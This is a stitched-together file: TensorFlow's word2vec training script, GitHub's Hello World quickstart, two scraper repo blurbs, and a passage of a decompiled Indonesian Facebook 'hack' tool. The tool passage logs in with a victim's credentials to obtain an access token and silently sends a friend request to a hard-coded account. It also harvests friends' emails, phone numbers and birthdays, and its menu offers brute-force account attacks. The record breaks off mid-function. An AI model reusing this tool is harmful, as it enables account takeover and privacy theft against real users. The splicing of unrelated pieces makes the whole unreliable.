# Copyright 2015 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Multi-threaded word2vec mini-batched skip-gram model. Trains the model described in: (Mikolov, et. al.) Efficient Estimation of Word Representations in Vector Space ICLR 2013. http://arxiv.org/abs/1301.3781 This model does traditional minibatching. The key ops used are: * placeholder for feeding in tensors for each example. * embedding_lookup for fetching rows from the embedding matrix. * sigmoid_cross_entropy_with_logits to calculate the loss. * GradientDescentOptimizer for optimizing the loss. * skipgram custom op that does input processing. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import sys import threading import time from six.moves import xrange # pylint: disable=redefined-builtin import numpy as np import tensorflow as tf from tensorflow.models.embedding import gen_word2vec as word2vec flags = tf.app.flags flags.DEFINE_string("save_path", None, "Directory to write the model and " "training summaries.") flags.DEFINE_string("train_data", None, "Training text file. " "E.g., unzipped file http://mattmahoney.net/dc/text8.zip.") flags.DEFINE_string( "eval_data", None, "File consisting of analogies of four tokens." "embedding 2 - embedding 1 + embedding 3 should be close " "to embedding 4." "E.g. https://word2vec.googlecode.com/svn/trunk/questions-words.txt.") flags.DEFINE_integer("embedding_size", 200, "The embedding dimension size.") flags.DEFINE_integer( "epochs_to_train", 15, "Number of epochs to train. Each epoch processes the training data once " "completely.") flags.DEFINE_float("learning_rate", 0.2, "Initial learning rate.") flags.DEFINE_integer("num_neg_samples", 100, "Negative samples per training example.") flags.DEFINE_integer("batch_size", 16, "Number of training examples processed per step " "(size of a minibatch).") flags.DEFINE_integer("concurrent_steps", 12, "The number of concurrent training steps.") flags.DEFINE_integer("window_size", 5, "The number of words to predict to the left and right " "of the target word.") flags.DEFINE_integer("min_count", 5, "The minimum number of word occurrences for it to be " "included in the vocabulary.") flags.DEFINE_float("subsample", 1e-3, "Subsample threshold for word occurrence. Words that appear " "with higher frequency will be randomly down-sampled. Set " "to 0 to disable.") flags.DEFINE_boolean( "interactive", False, "If true, enters an IPython interactive session to play with the trained " "model. E.g., try model.analogy('france', 'paris', 'russia') and " "model.nearby(['proton', 'elephant', 'maxwell']") flags.DEFINE_integer("statistics_interval", 5, "Print statistics every n seconds.") flags.DEFINE_integer("summary_interval", 5, "Save training summary to file every n seconds (rounded " "up to statistics interval.") flags.DEFINE_integer("checkpoint_interval", 600, "Checkpoint the model (i.e. save the parameters) every n " "seconds (rounded up to statistics interval.") FLAGS = flags.FLAGS class Options(object): """Options used by our word2vec model.""" def __init__(self): # Model options. # Embedding dimension. self.emb_dim = FLAGS.embedding_size # Training options. # The training text file. self.train_data = FLAGS.train_data # Number of negative samples per example. self.num_samples = FLAGS.num_neg_samples # The initial learning rate. self.learning_rate = FLAGS.learning_rate # Number of epochs to train. After these many epochs, the learning # rate decays linearly to zero and the training stops. self.epochs_to_train = FLAGS.epochs_to_train # Concurrent training steps. self.concurrent_steps = FLAGS.concurrent_steps # Number of examples for one training step. self.batch_size = FLAGS.batch_size # The number of words to predict to the left and right of the target word. self.window_size = FLAGS.window_size # The minimum number of word occurrences for it to be included in the # vocabulary. self.min_count = FLAGS.min_count # Subsampling threshold for word occurrence. self.subsample = FLAGS.subsample # How often to print statistics. self.statistics_interval = FLAGS.statistics_interval # How often to write to the summary file (rounds up to the nearest # statistics_interval). self.summary_interval = FLAGS.summary_interval # How often to write checkpoints (rounds up to the nearest statistics # interval). self.checkpoint_interval = FLAGS.checkpoint_interval # Where to write out summaries. self.save_path = FLAGS.save_path # Eval options. # The text file for eval. self.eval_data = FLAGS.eval_data class Word2Vec(object): """Word2Vec model (Skipgram).""" def __init__(self, options, session): self._options = options self._session = session self._word2id = {} self._id2word = [] self.build_graph() self.build_eval_graph() self.save_vocab() self._read_analogies() def _read_analogies(self): """Reads through the analogy question file. Returns: questions: a [n, 4] numpy array containing the analogy question's word ids. questions_skipped: questions skipped due to unknown words. """ questions = [] questions_skipped = 0 with open(self._options.eval_data, "rb") as analogy_f: for line in analogy_f: if line.startswith(b":"): # Skip comments. continue words = line.strip().lower().split(b" ") ids = [self._word2id.get(w.strip()) for w in words] if None in ids or len(ids) != 4: questions_skipped += 1 else: questions.append(np.array(ids)) print("Eval analogy file: ", self._options.eval_data) print("Questions: ", len(questions)) print("Skipped: ", questions_skipped) self._analogy_questions = np.array(questions, dtype=np.int32) def forward(self, examples, labels): """Build the graph for the forward pass.""" opts = self._options # Declare all variables we need. # Embedding: [vocab_size, emb_dim] init_width = 0.5 / opts.emb_dim emb = tf.Variable( tf.random_uniform( [opts.vocab_size, opts.emb_dim], -init_width, init_width), name="emb") self._emb = emb # Softmax weight: [vocab_size, emb_dim]. Transposed. sm_w_t = tf.Variable( tf.zeros([opts.vocab_size, opts.emb_dim]), name="sm_w_t") # Softmax bias: [emb_dim]. sm_b = tf.Variable(tf.zeros([opts.vocab_size]), name="sm_b") # Global step: scalar, i.e., shape []. self.global_step = tf.Variable(0, name="global_step") # Nodes to compute the nce loss w/ candidate sampling. labels_matrix = tf.reshape( tf.cast(labels, dtype=tf.int64), [opts.batch_size, 1]) # Negative sampling. sampled_ids, _, _ = (tf.nn.fixed_unigram_candidate_sampler( true_classes=labels_matrix, num_true=1, num_sampled=opts.num_samples, unique=True, range_max=opts.vocab_size, distortion=0.75, unigrams=opts.vocab_counts.tolist())) # Embeddings for examples: [batch_size, emb_dim] example_emb = tf.nn.embedding_lookup(emb, examples) # Weights for labels: [batch_size, emb_dim] true_w = tf.nn.embedding_lookup(sm_w_t, labels) # Biases for labels: [batch_size, 1] true_b = tf.nn.embedding_lookup(sm_b, labels) # Weights for sampled ids: [num_sampled, emb_dim] sampled_w = tf.nn.embedding_lookup(sm_w_t, sampled_ids) # Biases for sampled ids: [num_sampled, 1] sampled_b = tf.nn.embedding_lookup(sm_b, sampled_ids) # True logits: [batch_size, 1] true_logits = tf.reduce_sum(tf.mul(example_emb, true_w), 1) + true_b # Sampled logits: [batch_size, num_sampled] # We replicate sampled noise lables for all examples in the batch # using the matmul. sampled_b_vec = tf.reshape(sampled_b, [opts.num_samples]) sampled_logits = tf.matmul(example_emb, sampled_w, transpose_b=True) + sampled_b_vec return true_logits, sampled_logits def nce_loss(self, true_logits, sampled_logits): """Build the graph for the NCE loss.""" # cross-entropy(logits, labels) opts = self._options true_xent = tf.nn.sigmoid_cross_entropy_with_logits( true_logits, tf.ones_like(true_logits)) sampled_xent = tf.nn.sigmoid_cross_entropy_with_logits( sampled_logits, tf.zeros_like(sampled_logits)) # NCE-loss is the sum of the true and noise (sampled words) # contributions, averaged over the batch. nce_loss_tensor = (tf.reduce_sum(true_xent) + tf.reduce_sum(sampled_xent)) / opts.batch_size return nce_loss_tensor def optimize(self, loss): """Build the graph to optimize the loss function.""" # Optimizer nodes. # Linear learning rate decay. opts = self._options words_to_train = float(opts.words_per_epoch * opts.epochs_to_train) lr = opts.learning_rate * tf.maximum( 0.0001, 1.0 - tf.cast(self._words, tf.float32) / words_to_train) self._lr = lr optimizer = tf.train.GradientDescentOptimizer(lr) train = optimizer.minimize(loss, global_step=self.global_step, gate_gradients=optimizer.GATE_NONE) self._train = train def build_eval_graph(self): """Build the eval graph.""" # Eval graph # Each analogy task is to predict the 4th word (d) given three # words: a, b, c. E.g., a=italy, b=rome, c=france, we should # predict d=paris. # The eval feeds three vectors of word ids for a, b, c, each of # which is of size N, where N is the number of analogies we want to # evaluate in one batch. analogy_a = tf.placeholder(dtype=tf.int32) # [N] analogy_b = tf.placeholder(dtype=tf.int32) # [N] analogy_c = tf.placeholder(dtype=tf.int32) # [N] # Normalized word embeddings of shape [vocab_size, emb_dim]. nemb = tf.nn.l2_normalize(self._emb, 1) # Each row of a_emb, b_emb, c_emb is a word's embedding vector. # They all have the shape [N, emb_dim] a_emb = tf.gather(nemb, analogy_a) # a's embs b_emb = tf.gather(nemb, analogy_b) # b's embs c_emb = tf.gather(nemb, analogy_c) # c's embs # We expect that d's embedding vectors on the unit hyper-sphere is # near: c_emb + (b_emb - a_emb), which has the shape [N, emb_dim]. target = c_emb + (b_emb - a_emb) # Compute cosine distance between each pair of target and vocab. # dist has shape [N, vocab_size]. dist = tf.matmul(target, nemb, transpose_b=True) # For each question (row in dist), find the top 4 words. _, pred_idx = tf.nn.top_k(dist, 4) # Nodes for computing neighbors for a given word according to # their cosine distance. nearby_word = tf.placeholder(dtype=tf.int32) # word id nearby_emb = tf.gather(nemb, nearby_word) nearby_dist = tf.matmul(nearby_emb, nemb, transpose_b=True) nearby_val, nearby_idx = tf.nn.top_k(nearby_dist, min(1000, self._options.vocab_size)) # Nodes in the construct graph which are used by training and # evaluation to run/feed/fetch. self._analogy_a = analogy_a self._analogy_b = analogy_b self._analogy_c = analogy_c self._analogy_pred_idx = pred_idx self._nearby_word = nearby_word self._nearby_val = nearby_val self._nearby_idx = nearby_idx def build_graph(self): """Build the graph for the full model.""" opts = self._options # The training data. A text file. (words, counts, words_per_epoch, self._epoch, self._words, examples, labels) = word2vec.skipgram(filename=opts.train_data, batch_size=opts.batch_size, window_size=opts.window_size, min_count=opts.min_count, subsample=opts.subsample) (opts.vocab_words, opts.vocab_counts, opts.words_per_epoch) = self._session.run([words, counts, words_per_epoch]) opts.vocab_size = len(opts.vocab_words) print("Data file: ", opts.train_data) print("Vocab size: ", opts.vocab_size - 1, " + UNK") print("Words per epoch: ", opts.words_per_epoch) self._examples = examples self._labels = labels self._id2word = opts.vocab_words for i, w in enumerate(self._id2word): self._word2id[w] = i true_logits, sampled_logits = self.forward(examples, labels) loss = self.nce_loss(true_logits, sampled_logits) tf.scalar_summary("NCE loss", loss) self._loss = loss self.optimize(loss) # Properly initialize all variables. tf.initialize_all_variables().run() self.saver = tf.train.Saver() def save_vocab(self): """Save the vocabulary to a file so the model can be reloaded.""" opts = self._options with open(os.path.join(opts.save_path, "vocab.txt"), "w") as f: for i in xrange(opts.vocab_size): f.write("%s %d\n" % (tf.compat.as_text(opts.vocab_words[i]), opts.vocab_counts[i])) def _train_thread_body(self): initial_epoch, = self._session.run([self._epoch]) while True: _, epoch = self._session.run([self._train, self._epoch]) if epoch != initial_epoch: break def train(self): """Train the model.""" opts = self._options initial_epoch, initial_words = self._session.run([self._epoch, self._words]) summary_op = tf.merge_all_summaries() summary_writer = tf.train.SummaryWriter(opts.save_path, graph_def=self._session.graph_def) workers = [] for _ in xrange(opts.concurrent_steps): t = threading.Thread(target=self._train_thread_body) t.start() workers.append(t) last_words, last_time, last_summary_time = initial_words, time.time(), 0 last_checkpoint_time = 0 while True: time.sleep(opts.statistics_interval) # Reports our progress once a while. (epoch, step, loss, words, lr) = self._session.run( [self._epoch, self.global_step, self._loss, self._words, self._lr]) now = time.time() last_words, last_time, rate = words, now, (words - last_words) / ( now - last_time) print("Epoch %4d Step %8d: lr = %5.3f loss = %6.2f words/sec = %8.0f\r" % (epoch, step, lr, loss, rate), end="") sys.stdout.flush() if now - last_summary_time > opts.summary_interval: summary_str = self._session.run(summary_op) summary_writer.add_summary(summary_str, step) last_summary_time = now if now - last_checkpoint_time > opts.checkpoint_interval: self.saver.save(self._session, opts.save_path + "model", global_step=step.astype(int)) last_checkpoint_time = now if epoch != initial_epoch: break for t in workers: t.join() return epoch def _predict(self, analogy): """Predict the top 4 answers for analogy questions.""" idx, = self._session.run([self._analogy_pred_idx], { self._analogy_a: analogy[:, 0], self._analogy_b: analogy[:, 1], self._analogy_c: analogy[:, 2] }) return idx def eval(self): """Evaluate analogy questions and reports accuracy.""" # How many questions we get right at precision@1. correct = 0 total = self._analogy_questions.shape[0] start = 0 while start < total: limit = start + 2500 sub = self._analogy_questions[start:limit, :] idx = self._predict(sub) start = limit for question in xrange(sub.shape[0]): for j in xrange(4): if idx[question, j] == sub[question, 3]: # Bingo! We predicted correctly. E.g., [italy, rome, france, paris]. correct += 1 break elif idx[question, j] in sub[question, :3]: # We need to skip words already in the question. continue else: # The correct label is not the precision@1 break print() print("Eval %4d/%d accuracy = %4.1f%%" % (correct, total, correct * 100.0 / total)) def analogy(self, w0, w1, w2): """Predict word w3 as in w0:w1 vs w2:w3.""" wid = np.array([[self._word2id.get(w, 0) for w in [w0, w1, w2]]]) idx = self._predict(wid) for c in [self._id2word[i] for i in idx[0, :]]: if c not in [w0, w1, w2]: return c return "unknown" def nearby(self, words, num=20): """Prints out nearby words given a list of words.""" ids = np.array([self._word2id.get(x, 0) for x in words]) vals, idx = self._session.run( [self._nearby_val, self._nearby_idx], {self._nearby_word: ids}) for i in xrange(len(words)): print("\n%s\n=====================================" % (words[i])) for (neighbor, distance) in zip(idx[i, :num], vals[i, :num]): print("%-20s %6.4f" % (self._id2word[neighbor], distance)) def _start_shell(local_ns=None): # An interactive shell is useful for debugging/development. import IPython user_ns = {} if local_ns: user_ns.update(local_ns) user_ns.update(globals()) IPython.start_ipython(argv=[], user_ns=user_ns) def main(_): """Train a word2vec model.""" if not FLAGS.train_data or not FLAGS.eval_data or not FLAGS.save_path: print("--train_data --eval_data and --save_path must be specified.") sys.exit(1) opts = Options() with tf.Graph().as_default(), tf.Session() as session: with tf.device("/cpu:0"): model = Word2Vec(opts, session) for _ in xrange(opts.epochs_to_train): model.train() # Process one epoch model.eval() # Eval analogies. # Perform a final save. model.saver.save(session, os.path.join(opts.save_path, "model.ckpt"), global_step=model.global_step) if FLAGS.interactive: # E.g., # [0]: model.analogy('france', 'paris', 'russia') # [1]: model.nearby(['proton', 'elephant', 'maxwell']) _start_shell(locals()) if __name__ == "__main__": tf.app.run()
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--- title: Hello World intro: 'Follow this Hello World exercise to get started with {% data variables.product.product_name %}.' versions: fpt: '*' ghes: '*' ghae: '*' ghec: '*' type: quick_start topics: - Pull requests - Fundamentals miniTocMaxHeadingLevel: 3 --- ## Introduction {% data variables.product.product_name %} is a code hosting platform for version control and collaboration. It lets you and others work together on projects from anywhere. This tutorial teaches you {% data variables.product.product_name %} essentials like repositories, branches, commits, and pull requests. You'll create your own Hello World repository and learn {% data variables.product.product_name %}'s pull request workflow, a popular way to create and review code. In this quickstart guide, you will: * Create and use a repository * Start and manage a new branch * Make changes to a file and push them to {% data variables.product.product_name %} as commits * Open and merge a pull request To complete this tutorial, you need a [{% data variables.product.product_name %} account](http://github.com) and Internet access. You don't need to know how to code, use the command line, or install Git (the version control software that {% data variables.product.product_name %} is built on). If you have a question about any of the expressions used in this guide, head on over to the [glossary](/get-started/quickstart/github-glossary) to find out more about our terminology. ## Creating a repository A repository is usually used to organize a single project. Repositories can contain folders and files, images, videos, spreadsheets, and data sets -- anything your project needs. Often, repositories include a _README_ file, a file with information about your project. _README_ files are written in the plain text Markdown language. You can use this [cheat sheet](https://www.markdownguide.org/cheat-sheet/) to get started with Markdown syntax. {% data variables.product.product_name %} lets you add a _README_ file at the same time you create your new repository. {% data variables.product.product_name %} also offers other common options such as a license file, but you do not have to select any of them now. Your `hello-world` repository can be a place where you store ideas, resources, or even share and discuss things with others. {% data reusables.repositories.create_new %} 1. In the **Repository name** box, enter `hello-world`. 2. In the **Description** box, write a short description. 3. Select **Add a README file**. 4. Select whether your repository will be **Public** or **Private**. 5. Click **Create repository**.  ## Creating a branch Branching lets you have different versions of a repository at one time. By default, your repository has one branch named `main` that is considered to be the definitive branch. You can create additional branches off of `main` in your repository. You can use branches to have different versions of a project at one time. This is helpful when you want to add new features to a project without changing the main source of code. The work done on different branches will not show up on the main branch until you merge it, which we will cover later in this guide. You can use branches to experiment and make edits before committing them to `main`. When you create a branch off the `main` branch, you're making a copy, or snapshot, of `main` as it was at that point in time. If someone else made changes to the `main` branch while you were working on your branch, you could pull in those updates. This diagram shows: * The `main` branch * A new branch called `feature` * The journey that `feature` takes before it's merged into `main`  Have you ever saved different versions of a file? Something like: * `story.txt` * `story-edit.txt` * `story-edit-reviewed.txt` Branches accomplish similar goals in {% data variables.product.product_name %} repositories. Here at {% data variables.product.product_name %}, our developers, writers, and designers use branches for keeping bug fixes and feature work separate from our `main` (production) branch. When a change is ready, they merge their branch into `main`. ### Create a branch 1. Click the **Code** tab of your `hello-world` repository. 2. Click the drop down at the top of the file list that says **main**.  4. Type a branch name, `readme-edits`, into the text box. 5. Click **Create branch: readme-edits from main**.  Now you have two branches, `main` and `readme-edits`. Right now, they look exactly the same. Next you'll add changes to the new branch. ## Making and committing changes When you created a new branch in the previous step, {% data variables.product.product_name %} brought you to the code page for your new `readme-edits` branch, which is a copy of `main`. You can make and save changes to the files in your repository. On {% data variables.product.product_name %}, saved changes are called commits. Each commit has an associated commit message, which is a description explaining why a particular change was made. Commit messages capture the history of your changes so that other contributors can understand what you’ve done and why. 1. Under the `readme-edits` branch you created, click the _README.md_ file. 2. Click {% octicon "pencil" aria-label="The edit icon" %} to edit the file. 3. In the editor, write a bit about yourself. Try using different Markdown elements. 4. In the **Commit changes** box, write a commit message that describes your changes. 5. Click **Commit changes**.  These changes will be made only to the README file on your `readme-edits` branch, so now this branch contains content that's different from `main`. ## Opening a pull request Now that you have changes in a branch off of `main`, you can open a pull request. Pull requests are the heart of collaboration on {% data variables.product.product_name %}. When you open a pull request, you're proposing your changes and requesting that someone review and pull in your contribution and merge them into their branch. Pull requests show diffs, or differences, of the content from both branches. The changes, additions, and subtractions are shown in different colors. As soon as you make a commit, you can open a pull request and start a discussion, even before the code is finished. By using {% data variables.product.product_name %}'s `@mention` feature in your pull request message, you can ask for feedback from specific people or teams, whether they're down the hall or 10 time zones away. You can even open pull requests in your own repository and merge them yourself. It's a great way to learn the {% data variables.product.product_name %} flow before working on larger projects. 1. Click the **Pull requests** tab of your `hello-world` repository. 2. Click **New pull request** 3. In the **Example Comparisons** box, select the branch you made, `readme-edits`, to compare with `main` (the original). 4. Look over your changes in the diffs on the Compare page, make sure they're what you want to submit.  5. Click **Create pull request**. 6. Give your pull request a title and write a brief description of your changes. You can include emojis and drag and drop images and gifs. 7. Optionally, to the right of your title and description, click the {% octicon "gear" aria-label="The Gear icon" %} next to **Reviewers**. **Assignees**, **Labels**, **Projects**, or **Milestone** to add any of these options to your pull request. You do not need to add any yet, but these options offer different ways to collaborate using pull requests. For more information, see "[About pull requests](/pull-requests/collaborating-with-pull-requests/proposing-changes-to-your-work-with-pull-requests/about-pull-requests)." 7. Click **Create pull request**. Your collaborators can now review your edits and make suggestions. ## Merging your pull request In this final step, you will merge your `readme-edits` branch into the `main` branch. After you merge your pull request, the changes on your `readme-edits` branch will be incorporated into `main`. Sometimes, a pull request may introduce changes to code that conflict with the existing code on `main`. If there are any conflicts, {% data variables.product.product_name %} will alert you about the conflicting code and prevent merging until the conflicts are resolved. You can make a commit that resolves the conflicts or use comments in the pull request to discuss the conflicts with your team members. In this walk-through, you should not have any conflicts, so you are ready to merge your branch into the main branch. 1. Click **Merge pull request** to merge the changes into `main`.  2. Click **Confirm merge**. You will receive a message that the request was successfully merged and the request was closed. 3. Click **Delete branch**. Now that your pull request is merged and your changes are on `main`, you can safely delete the `readme-edits` branch. If you want to make more changes to your project, you can always create a new branch and repeat this process. ## Next steps By completing this tutorial, you've learned to create a project and make a pull request on {% data variables.product.product_name %}. Here's what you accomplished in this tutorial: * Created an open source repository * Started and managed a new branch * Changed a file and committed those changes to {% data variables.product.product_name %} * Opened and merged a pull request Take a look at your {% data variables.product.product_name %} profile and you'll see your work reflected on your contribution graph. For more information about the power of branches and pull requests, see "[GitHub flow](/get-started/quickstart/github-flow)." For more information about getting started with {% data variables.product.product_name %}, see the other guides in the [getting started quickstart](/get-started/quickstart).
HarryLMoss
A system of several Python programs which utilise the Instagram Graph API to scrape Reel metadata of a user’s account such as likes, comments, captions and even a link to download the video directly in a lossless MP4 format.
iam-gary-lu
A GCP webapp built against Facebook’s Graph API to collect user comments and sentiment data. Collected data was used as training corpus for downstream NLP ML models.
Telzi
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U; id) Presto/2.12.423 Version/12.16')] def keluar(): print '\x1b[1;91m[!] Keluar' os.sys.exit() def jalan(z): for e in z + '\n': sys.stdout.write(e) sys.stdout.flush() time.sleep(0.01) logo = '\x1b[1;92m\n\xe2\x95\x94\xe2\x95\xa6\xe2\x95\x97\xe2\x94\x8c\xe2\x94\x80\xe2\x94\x90\xe2\x94\xac\xe2\x94\x80\xe2\x94\x90\xe2\x94\xac\xe2\x94\x8c\xe2\x94\x80 \xe2\x95\x94\xe2\x95\x90\xe2\x95\x97\xe2\x95\x94\xe2\x95\x97 \n \xe2\x95\x91\xe2\x95\x91\xe2\x94\x9c\xe2\x94\x80\xe2\x94\xa4\xe2\x94\x9c\xe2\x94\xac\xe2\x94\x98\xe2\x94\x9c\xe2\x94\xb4\xe2\x94\x90\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\xa0\xe2\x95\xa3 \xe2\x95\xa0\xe2\x95\xa9\xe2\x95\x97\n\xe2\x95\x90\xe2\x95\xa9\xe2\x95\x9d\xe2\x94\xb4 \xe2\x94\xb4\xe2\x94\xb4\xe2\x94\x94\xe2\x94\x80\xe2\x94\xb4 \xe2\x94\xb4 \xe2\x95\x9a \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \x1b[1;93mv1.6\n\x1b[1;93m* \x1b[1;97mAuthor \x1b[1;91m: \x1b[1;96mMltrCyber\x1b[1;97m\n\x1b[1;93m* \x1b[1;97mSupport \x1b[1;91m: \x1b[1;96mPersekukhaya Team SyStEm\x1b[1;97m[\x1b[1;96m\x1b[1;97m] \x1b[1;97m/ \x1b[1;96mGUNAKAN DENGAN BIJAK \x1b[1;97m/ \x1b[1;96mMltrCyber\n\x1b[1;93m* \x1b[1;97mGitHub \x1b[1;91m: \x1b[1;92m\x1b[4mhttps://github.com/MltrCyber\x1b[0m\n[*] Decompiled by MltrCyber\n' def tik(): titik = [ '. ', '.. ', '... '] for o in titik: print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mSedang Masuk COK \x1b[1;97m' + o, sys.stdout.flush() time.sleep(1) back = 0 threads = [] berhasil = [] cekpoint = [] gagal = [] idteman = [] idfromteman = [] idmem = [] id = [] em = [] emfromteman = [] hp = [] hpfromteman = [] reaksi = [] reaksigrup = [] komen = [] komengrup = [] listgrup = [] vulnot = '\x1b[31mNot Vuln' vuln = '\x1b[32mVuln' def login(): os.system('clear') try: toket = open('login.txt', 'r') menu() except (KeyError, IOError): os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mLOGIN AKUN FACEBOOK AKUN FB \x1b[1;91m[\xe2\x98\x86]' id = raw_input('\x1b[1;91m[+] \x1b[1;36mUsername FB \x1b[1;91m:\x1b[1;92m ') pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mPassword FB \x1b[1;91m:\x1b[1;92m ') tik() try: br.open('https://m.facebook.com') except mechanize.URLError: print '\n\x1b[1;91m[!] Tidak ada koneksi' keluar() br._factory.is_html = True br.select_form(nr=0) br.form['email'] = id br.form['pass'] = pwd br.submit() url = br.geturl() if 'save-device' in url: try: sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32' data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'} x = hashlib.new('md5') x.update(sig) a = x.hexdigest() data.update({'sig': a}) url = 'https://api.facebook.com/restserver.php' r = requests.get(url, params=data) z = json.loads(r.text) zedd = open('login.txt', 'w') zedd.write(z['access_token']) zedd.close() print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin berhasil' requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token']) os.system('xdg-open https://youtube.com/NjankSoekamti') time.sleep(2) menu() except requests.exceptions.ConnectionError: print '\n\x1b[1;91m[!] Tidak ada koneksi' keluar() if 'checkpoint' in url: print '\n\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint' os.system('rm -rf login.txt') time.sleep(1) keluar() else: print '\n\x1b[1;91m[!] Login Gagal' os.system('rm -rf login.txt') time.sleep(1) login() def menu(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: os.system('clear') print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: otw = requests.get('https://graph.facebook.com/me?access_token=' + toket) a = json.loads(otw.text) nama = a['name'] id = a['id'] except KeyError: os.system('clear') print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint' os.system('rm -rf login.txt') time.sleep(1) login() except requests.exceptions.ConnectionError: print '\x1b[1;91m[!] Tidak ada koneksi' keluar() os.system('clear') print logo print '\x1b[1;97m\xe2\x95\x94' + 40 * '\xe2\x95\x90' print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Nama \x1b[1;91m: \x1b[1;92m' + nama print '\x1b[1;97m\xe2\x95\x9a' + 40 * '\xe2\x95\x90' print '\x1b[1;37;40m1. Informasi Pengguna' print '\x1b[1;37;40m2. Hack Akun Facebook' print '\x1b[1;37;40m3. Bot ' print '\x1b[1;37;40m4. Lainnya.... ' print '\x1b[1;37;40m5. LogOut ' print '\x1b[1;31;40m0. Keluar ' print pilih() def pilih(): zedd = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if zedd == '': print '\x1b[1;91m[!] Jangan kosong' pilih() else: if zedd == '1': informasi() else: if zedd == '2': menu_hack() else: if zedd == '3': menu_bot() else: if zedd == '4': lain() else: if zedd == '5': os.system('rm -rf login.txt') os.system('xdg-open https://www.youtube.com/nganunymous') keluar() else: if zedd == '0': keluar() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mTidak ada' pilih() def informasi(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' id = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID\x1b[1;97m/\x1b[1;92mNama\x1b[1;91m : \x1b[1;97m') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) cok = json.loads(r.text) for p in cok['data']: if id in p['name'] or id in p['id']: r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket) z = json.loads(r.text) print 40 * '\x1b[1;97m\xe2\x95\x90' try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak ada' else: try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak ada' else: try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak ada' else: try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor HP\x1b[1;97m : ' + z['mobile_phone'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mNomor HP\x1b[1;97m : \x1b[1;91mTidak ada' try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak ada' try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mTanggal Lahir\x1b[1;97m : ' + z['birthday'] except KeyError: print '\x1b[1;91m[?] \x1b[1;92mTanggal Lahir\x1b[1;97m : \x1b[1;91mTidak ada' try: print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : ' for q in z['education']: try: print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name'] except KeyError: print '\x1b[1;91m ~ \x1b[1;91mTidak ada' except KeyError: pass raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu() else: print '\x1b[1;91m[\xe2\x9c\x96] Pengguna tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu() def menu_hack(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. Mini Hack Facebook(\x1b[1;92mTarget\x1b[1;97m)' print '\x1b[1;37;40m2. Multi Bruteforce Facebook' print '\x1b[1;37;40m3. Super Multi Bruteforce Facebook' print '\x1b[1;37;40m4. BruteForce(\x1b[1;92mTarget\x1b[1;97m)' print '\x1b[1;37;40m5. Yahoo Checker' print '\x1b[1;37;40m6. Ambil id/email/hp' print '\x1b[1;31;40m0. Kembali' print hack_pilih() def hack_pilih(): 